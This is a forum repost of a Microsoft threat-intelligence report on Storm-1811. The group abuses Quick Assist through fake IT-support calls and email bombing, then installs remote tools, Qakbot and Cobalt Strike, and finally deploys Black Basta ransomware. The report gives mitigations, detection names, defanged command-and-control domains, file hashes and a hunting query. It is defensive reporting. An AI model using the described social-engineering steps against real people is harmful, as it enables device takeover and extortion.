Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Software
Security Apps
Microsoft Defender
Threat actors misusing Quick Assist in social engineering attacks leading to ransomware
Message
<blockquote data-quote="Microsoft Threat Intelligence" data-source="post: 1086953"><p>Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool <a href="https://learn.microsoft.com/windows/client-management/client-tools/quick-assist" target="_blank">Quick Assist</a> to target users in social engineering attacks. Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware. The observed activity begins with impersonation through voice phishing (<a href="https://www.microsoft.com/microsoft-365-life-hacks/privacy-and-safety/what-is-a-vishing-attack" target="_blank">vishing</a>), followed by delivery of malicious tools, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware like Qakbot, Cobalt Strike, and ultimately Black Basta ransomware.</p><p></p><p></p><p>MITIGATE THIS THREAT</p><p></p><p><a href="https://blogs.technet.microsoft.com/mmpc/#recommendations" target="_blank"> Get recommendations </a></p><p></p><p>Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting. Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device.</p><p></p><p></p><p>RANSOMWARE AS A SERVICE</p><p></p><p><a href="https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#defending-against-ransomware" target="_blank"> Protect users and orgs </a></p><p></p><p>In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams. Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity.</p><p></p><p></p><p>TECH SUPPORT SCAMS</p><p></p><p><a href="https://support.microsoft.com/en-us/windows/report-a-technical-support-scam-cfa4609a-92cc-4808-95e8-392b4ffd0753" target="_blank"> Report scam </a></p><p></p><p>Organizations can also reduce the risk of attacks by <a href="https://learn.microsoft.com/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization" target="_blank">blocking or uninstalling</a> Quick Assist and other remote management tools if the tools are not in use in their environment. Quick Assist is installed by default on devices running Windows 11. Additionally, <a href="https://support.microsoft.com/windows/protect-yourself-from-tech-support-scams-2ebf91bd-f94c-2a8a-e541-f5c800d18435" target="_blank">tech support scams</a> are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services. Educating users on how to recognize such scams can significantly reduce the impact of <a href="https://www.microsoft.com/microsoft-365-life-hacks/privacy-and-safety/what-is-social-engineering." target="_blank">social engineering attacks</a>. </p><p></p><h2>Social engineering</h2><p></p><p>One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks. Vishing attacks are a form of social engineering that involves callers luring targets into revealing sensitive information under false pretenses or tricking targets into carrying out actions on behalf of the caller.</p><p></p><p>For example, threat actors might attempt to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device. In other cases, threat actors initiate link listing attacks – a type of <a href="https://www.hhs.gov/sites/default/files/email-bombing-sector-alert-tlpclear.pdf" target="_blank">email bombing attack</a>, where threat actors sign up targeted emails to multiple email subscription services to flood email addresses indirectly with subscribed content. Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue.</p><p></p><p>During the call, the threat actor persuades the user to grant them access to their device through Quick Assist. The target user only needs to press CTRL + Windows + Q and enter the security code provided by the threat actor, as shown in the figure below.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig1-Quick-Assist.webp" alt="Screenshot of Quick Assist prompt to enter security code" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 1. Quick Assist prompt to enter security code</em></p><p></p><p>After the target enters the security code, they receive a dialog box asking for permission to allow screen sharing. Selecting <em>Allow</em> shares the user’s screen with the actor.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig2-Quick-Assist.webp" alt="Screenshot of Quick Assist dialog box asking permission to allow screen sharing" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 2. Quick Assist dialog box asking permission to allow screen sharing</em></p><p></p><p>Once in the session, the threat actor can select <em>Request Control</em>, which if approved by the target, grants the actor full control of the target’s device.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig3-Quick-Assist-1024x89.webp" alt="Screenshot of Quick Assist dialog box asking permission to allow control" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 3. Quick Assist dialog box asking permission to allow control</em></p><h2>Follow-on activity leading to Black Basta ransomware</h2><p></p><p>Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads. Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials. In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig4-Quick-Assist.webp" alt="Screenshot of two lines of cURL commands" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 4. Examples of cURL commands to download batch files and ZIP files</em></p><p></p><p>Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811.</p><p></p><p>ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.</p><p></p><p>The mentioned RMM tools are commonly used by threat actors because of their extensive capabilities and ability to blend in with the environment. In some cases, the actors leveraged the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence. </p><p></p><p>After the threat actor installs the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network.</p><p></p><p>Black Basta is a closed ransomware offering (exclusive and not openly marketed like ransomware as a service) distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development. Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from Qakbot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat. In the next sections, we share recommendations for improving defenses against this threat, including best practices when using Quick Assist and mitigations for reducing the impact of Black Basta and other ransomware.</p><p></p><h2>Recommendations</h2><p></p><p>Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:</p><p></p><ul> <li data-xf-list-type="ul">Consider <a href="https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization" target="_blank">blocking or uninstalling</a> Quick Assist and other remote monitoring and management tools if these tools are not in use in your environment. If your organization utilizes another remote support tool such as <a href="https://www.microsoft.com/security/business/endpoint-management/microsoft-intune-remote-help" target="_blank">Remote Help</a>, block or remove Quick Assist as a best practice. Remote Help is part of the <a href="https://learn.microsoft.com/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization" target="_blank">Microsoft Intune Suite</a> and provides authentication and security controls for helpdesk connections.</li> <li data-xf-list-type="ul">Educate users about protecting themselves from <a href="https://support.microsoft.com/windows/protect-yourself-from-tech-support-scams-2ebf91bd-f94c-2a8a-e541-f5c800d18435" target="_blank">tech support scams</a>. Tech support scams are an industry-wide issue where scammers use scary tactics to trick users into unnecessary technical support services.</li> <li data-xf-list-type="ul">Only allow a helper to connect to your device using Quick Assist if you initiated the interaction by contacting Microsoft Support or your IT support staff directly. Don’t provide access to anyone claiming to have an urgent need to access your device.</li> <li data-xf-list-type="ul">If you suspect that the person connecting to your device is conducting malicious activity, disconnect from the session immediately and report to your local authorities and/or any relevant IT members within your organization.</li> <li data-xf-list-type="ul">Users who have been affected by a tech support scam can also use the Microsoft <a href="https://support.microsoft.com/windows/cfa4609a-92cc-4808-95e8-392b4ffd0753" target="_blank">technical support scam form</a> to report it.</li> </ul><p></p><p>Microsoft recommends the following mitigations to reduce the impact of this threat:</p><p></p><ul> <li data-xf-list-type="ul">Educate users about <a href="https://www.microsoft.com/security/business/security-101/what-is-email-security?ocid=magicti_ta_abbreviatedmktgpage" target="_blank">protecting personal and business information</a> in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.</li> <li data-xf-list-type="ul">Educate users about <a href="https://www.microsoft.com/security/business/security-101/what-is-malware?ocid=magicti_ta_abbreviatedmktgpage" target="_blank">preventing malware infections</a>, such as ignoring or deleting unsolicited and unexpected emails or attachments sent through instant messaging applications or social networks as well as suspicious phone calls.</li> <li data-xf-list-type="ul">Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-security-center-mdo?ocid=magicti_ta_learndoc" target="_blank">Microsoft Defender for Office 365</a> brings together incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.</li> <li data-xf-list-type="ul">Turn on <a href="https://learn.microsoft.com/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus" target="_blank">cloud-delivered protection</a> in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.</li> <li data-xf-list-type="ul">Enable <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?ocid=magicti_ta_learndoc" target="_blank">network protection</a> to prevent applications or users from accessing malicious domains and other malicious content on the internet.</li> <li data-xf-list-type="ul">Turn on <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection" target="_blank">tamper protection</a> features to prevent attackers from stopping security services.</li> <li data-xf-list-type="ul">Enable <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations" target="_blank">investigation and remediation</a> in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.</li> <li data-xf-list-type="ul">Refer to <a href="https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/" target="_blank">Microsoft’s human-operated ransomware overview</a> for general hardening recommendations against ransomware attacks.</li> </ul><p></p><p>Microsoft Defender XDR customers can turn on <a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc" target="_blank">attack surface reduction rules</a> to prevent common attack techniques:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion" target="_blank">Block executable files from running unless they meet a prevalence, age, or trusted list criterion</a></li> <li data-xf-list-type="ul"><a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#block-execution-of-potentially-obfuscated-scripts" target="_blank">Block execution of potentially obfuscated scripts</a></li> <li data-xf-list-type="ul"><a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands" target="_blank">Block process creations originating from PSExec and WMI commands</a></li> <li data-xf-list-type="ul"><a href="https://learn.microsoft.com/defender-endpoint/attack-surface-reduction-rules-reference?ocid=magicti_ta_learndoc#use-advanced-protection-against-ransomware" target="_blank">Use advanced protection against ransomware</a></li> </ul><h2>Detection details</h2><h3>Microsoft Defender Antivirus </h3><p></p><p>Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Qakbot" target="_blank">TrojanDownloader:O97M/Qakbot</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Qbot" target="_blank">Trojan:Win32/QBot</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Qakbot" target="_blank">Trojan:Win32/Qakbot</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Qakbot" target="_blank">TrojanSpy:Win32/Qakbot</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/threat-search?query=Behavior:Win32/Qakbot.A" target="_blank">Behavior:Win32/Qakbot</a></li> </ul><p></p><p>Black Basta threat components are detected as the following:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Basta.B&threatId=-2147132479" target="_blank">Behavior:Win32/Basta</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Basta.AA&threatId=-2147149077" target="_blank">Ransom:Win32/Basta</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Basta!BV&threatId=-2147142676" target="_blank">Trojan:Win32/Basta</a></li> </ul><p></p><p>Microsoft Defender Antivirus detects Beacon running on a victim process as the following:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/CobaltStrike" target="_blank">Behavior:Win32/CobaltStrike</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win64/CobaltStrike&threatId=-2147180169" target="_blank">Backdoor:Win64/CobaltStrike</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win64/CobaltStrike" target="_blank">HackTool:Win64/CobaltStrike</a></li> </ul><p></p><p>Additional Cobalt Strike components are detected as the following:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375" target="_blank">TrojanDropper<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="smilie smilie--sprite smilie--sprite115" alt=":p" title="Stick out tongue :p" loading="lazy" data-shortname=":p" />owerShell/Cobacis</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/TurtleLoader.CS!dha&threatId=-2147187531" target="_blank">Trojan:Win64/TurtleLoader.CS</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/ShellCode.BN&threatId=-2147237640" target="_blank">Exploit:Win32/ShellCode.BN</a></li> </ul><h3>Microsoft Defender for Endpoint</h3><p></p><p>Alerts with the following title in the security center can indicate threat activity on your network:</p><p></p><ul> <li data-xf-list-type="ul">Suspicious activity using Quick Assist</li> </ul><p></p><p>The following alerts might also indicate activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.</p><p></p><ul> <li data-xf-list-type="ul">Suspicious curl behavior</li> <li data-xf-list-type="ul">A file or network connection related to a ransomware-linked emerging threat activity group detected —<em>This alert captures Storm-1811 activity</em></li> <li data-xf-list-type="ul">Ransomware-linked emerging threat activity group Storm-0303 detected — <em>This alert captures some Qakbot distributor activity</em></li> <li data-xf-list-type="ul">Possible Qakbot activity</li> <li data-xf-list-type="ul">Possible NetSupport Manager activity</li> <li data-xf-list-type="ul">Possibly malicious use of proxy or tunneling tool</li> <li data-xf-list-type="ul">Suspicious usage of remote management software</li> <li data-xf-list-type="ul">Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)</li> <li data-xf-list-type="ul">Human-operated attack using Cobalt Strike</li> <li data-xf-list-type="ul">Ransomware behavior detected in the file system</li> </ul><h2>Indicators of compromise</h2><p></p><p><strong>Domain names:</strong></p><p></p><ul> <li data-xf-list-type="ul">upd7a[.]com</li> <li data-xf-list-type="ul">upd7[.]com</li> <li data-xf-list-type="ul">upd9[.]com</li> <li data-xf-list-type="ul">upd5[.]pro</li> </ul><p></p><p><strong>SHA-256:</strong></p><p></p><ul> <li data-xf-list-type="ul">71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8</li> <li data-xf-list-type="ul">0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0</li> <li data-xf-list-type="ul">1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30</li> <li data-xf-list-type="ul">93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7</li> <li data-xf-list-type="ul">1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb</li> </ul><p></p><p><strong>ScreenConnect relay:</strong></p><p></p><ul> <li data-xf-list-type="ul">instance-olqdnn-relay.screenconnect[.]com</li> </ul><p></p><p><strong>NetSupport C2:</strong></p><p></p><ul> <li data-xf-list-type="ul">greekpool[.]com</li> </ul><p></p><p><strong>Cobalt Strike Beacon C2:</strong></p><p></p><ul> <li data-xf-list-type="ul">zziveastnews[.]com</li> <li data-xf-list-type="ul">realsepnews[.]com</li> </ul><h2>Advanced hunting </h2><h3>Microsoft Defender XDR</h3><p></p><p>To locate possible malicious activity, run the following query in the Microsoft Defender portal:</p><p></p><p>This query looks for possible email bombing activity:</p><p></p><p></p><p></p><p>EmailEvents</p><p>| where EmailDirection == "Inbound"</p><p>| make-series Emailcount = count()</p><p> on Timestamp step 1h by RecipientObjectId</p><p>| extend (Anomalies, AnomalyScore, ExpectedEmails) = series_decompose_anomalies(Emailcount)</p><p>| mv-expand Emailcount, Anomalies, AnomalyScore, ExpectedEmails to typeof(double), Timestamp</p><p>| where Anomalies != 0</p><p>| where AnomalyScore >= 10</p><h3>Microsoft Sentinel</h3><p></p><p>Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the <a href="https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy" target="_blank">Microsoft Sentinel Content Hub</a> to have the analytics rule deployed in their Sentinel workspace.</p><p></p><p>Microsoft Sentinel also has a range of hunting queries available in Sentinel GitHub repo or as part of Sentinel solutions that customers can use to detect the activity detailed in this blog in addition to Microsoft Defender detections. These hunting queries include the following:</p><p></p><p>Qakbot:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/Qakbot" target="_blank">Qakbot hunting queries</a></li> </ul><p></p><p>Cobalt Strike:</p><p></p><ul> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker%20Tools%20Threat%20Protection%20Essentials/Hunting%20Queries/CobaltDNSBeacon.yaml" target="_blank">Cobalt Strike DNS Beaconing</a></li> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/Potential%20ransomware%20activity%20related%20to%20Cobalt%20Strike.yaml" target="_blank">Potential ransomware activity related to Cobalt Strike</a></li> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/FalconFriday/Analytic%20Rules/SuspiciousNamedPipes.yaml" target="_blank">Suspicious named pipes</a></li> <li data-xf-list-type="ul"><a href="https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/cobalt-strike-invoked-w-wmi.yaml" target="_blank">Cobalt Strike Invocation using WMI</a></li> </ul><h2>References</h2> <ul> <li data-xf-list-type="ul"><a href="https://www.hhs.gov/sites/default/files/email-bombing-sector-alert-tlpclear.pdf" target="_blank">Defense and Mitigations from E-mail Bombing</a>. U.S. Department of Health and Human Services, Health Sector Cybersecurity Coordination Center</li> </ul><h2>Learn more</h2><p></p><p>For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <a href="https://aka.ms/threatintelblog" target="_blank">Threat intelligence | Microsoft Security Blog</a>.</p><p></p><p>To get notified about new publications and to join discussions on social media, follow us on LinkedIn at <a href="https://www.linkedin.com/showcase/microsoft-threat-intelligence" target="_blank">Microsoft Threat Intelligence | LinkedIn</a>, and on X (formerly Twitter) at <a href="https://twitter.com/MsftSecIntel" target="_blank">https://twitter.com/MsftSecIntel</a>.</p><p></p><p>To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: <a href="https://thecyberwire.com/podcasts/microsoft-threat-intelligence" target="_blank">https://thecyberwire.com/podcasts/microsoft-threat-intelligence</a>.</p><p></p><p></p><p>The post <a href="https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/" target="_blank">Threat actors misusing Quick Assist in social engineering attacks leading to ransomware</a> appeared first on <a href="https://www.microsoft.com/en-us/security/blog" target="_blank">Microsoft Security Blog</a>.</p></blockquote><p></p>
[QUOTE="Microsoft Threat Intelligence, post: 1086953"] Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool [URL='https://learn.microsoft.com/windows/client-management/client-tools/quick-assist']Quick Assist[/URL] to target users in social engineering attacks. Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware. The observed activity begins with impersonation through voice phishing ([URL='https://www.microsoft.com/microsoft-365-life-hacks/privacy-and-safety/what-is-a-vishing-attack']vishing[/URL]), followed by delivery of malicious tools, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware like Qakbot, Cobalt Strike, and ultimately Black Basta ransomware. MITIGATE THIS THREAT [URL='https://blogs.technet.microsoft.com/mmpc/#recommendations'] Get recommendations [/URL] Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting. Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device. RANSOMWARE AS A SERVICE [URL='https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#defending-against-ransomware'] Protect users and orgs [/URL] In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams. Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity. TECH SUPPORT SCAMS [URL='https://support.microsoft.com/en-us/windows/report-a-technical-support-scam-cfa4609a-92cc-4808-95e8-392b4ffd0753'] Report scam [/URL] Organizations can also reduce the risk of attacks by [URL='https://learn.microsoft.com/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization']blocking or uninstalling[/URL] Quick Assist and other remote management tools if the tools are not in use in their environment. Quick Assist is installed by default on devices running Windows 11. Additionally, [URL='https://support.microsoft.com/windows/protect-yourself-from-tech-support-scams-2ebf91bd-f94c-2a8a-e541-f5c800d18435']tech support scams[/URL] are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services. Educating users on how to recognize such scams can significantly reduce the impact of [URL='https://www.microsoft.com/microsoft-365-life-hacks/privacy-and-safety/what-is-social-engineering.']social engineering attacks[/URL]. [HEADING=1]Social engineering[/HEADING] One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks. Vishing attacks are a form of social engineering that involves callers luring targets into revealing sensitive information under false pretenses or tricking targets into carrying out actions on behalf of the caller. For example, threat actors might attempt to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device. In other cases, threat actors initiate link listing attacks – a type of [URL='https://www.hhs.gov/sites/default/files/email-bombing-sector-alert-tlpclear.pdf']email bombing attack[/URL], where threat actors sign up targeted emails to multiple email subscription services to flood email addresses indirectly with subscribed content. Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue. During the call, the threat actor persuades the user to grant them access to their device through Quick Assist. The target user only needs to press CTRL + Windows + Q and enter the security code provided by the threat actor, as shown in the figure below. [IMG alt="Screenshot of Quick Assist prompt to enter security code"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig1-Quick-Assist.webp[/IMG] [I]Figure 1. Quick Assist prompt to enter security code[/I] After the target enters the security code, they receive a dialog box asking for permission to allow screen sharing. Selecting [I]Allow[/I] shares the user’s screen with the actor. [IMG alt="Screenshot of Quick Assist dialog box asking permission to allow screen sharing"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig2-Quick-Assist.webp[/IMG] [I]Figure 2. Quick Assist dialog box asking permission to allow screen sharing[/I] Once in the session, the threat actor can select [I]Request Control[/I], which if approved by the target, grants the actor full control of the target’s device. [IMG alt="Screenshot of Quick Assist dialog box asking permission to allow control"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig3-Quick-Assist-1024x89.webp[/IMG] [I]Figure 3. Quick Assist dialog box asking permission to allow control[/I] [HEADING=1]Follow-on activity leading to Black Basta ransomware[/HEADING] Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads. Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials. In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike. [IMG alt="Screenshot of two lines of cURL commands"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/05/Fig4-Quick-Assist.webp[/IMG] [I]Figure 4. Examples of cURL commands to download batch files and ZIP files[/I] Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811. ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands. The mentioned RMM tools are commonly used by threat actors because of their extensive capabilities and ability to blend in with the environment. In some cases, the actors leveraged the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence. After the threat actor installs the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network. Black Basta is a closed ransomware offering (exclusive and not openly marketed like ransomware as a service) distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development. Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from Qakbot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat. In the next sections, we share recommendations for improving defenses against this threat, including best practices when using Quick Assist and mitigations for reducing the impact of Black Basta and other ransomware. [HEADING=1]Recommendations[/HEADING] Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist: [LIST] [*]Consider [URL='https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization']blocking or uninstalling[/URL] Quick Assist and other remote monitoring and management tools if these tools are not in use in your environment. If your organization utilizes another remote support tool such as [URL='https://www.microsoft.com/security/business/endpoint-management/microsoft-intune-remote-help']Remote Help[/URL], block or remove Quick Assist as a best practice. Remote Help is part of the [URL='https://learn.microsoft.com/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization']Microsoft Intune Suite[/URL] and provides authentication and security controls for helpdesk connections. [*]Educate users about protecting themselves from [URL='https://support.microsoft.com/windows/protect-yourself-from-tech-support-scams-2ebf91bd-f94c-2a8a-e541-f5c800d18435']tech support scams[/URL]. Tech support scams are an industry-wide issue where scammers use scary tactics to trick users into unnecessary technical support services. [*]Only allow a helper to connect to your device using Quick Assist if you initiated the interaction by contacting Microsoft Support or your IT support staff directly. Don’t provide access to anyone claiming to have an urgent need to access your device. [*]If you suspect that the person connecting to your device is conducting malicious activity, disconnect from the session immediately and report to your local authorities and/or any relevant IT members within your organization. [*]Users who have been affected by a tech support scam can also use the Microsoft [URL='https://support.microsoft.com/windows/cfa4609a-92cc-4808-95e8-392b4ffd0753']technical support scam form[/URL] to report it. [/LIST] Microsoft recommends the following mitigations to reduce the impact of this threat: [LIST] [*]Educate users about 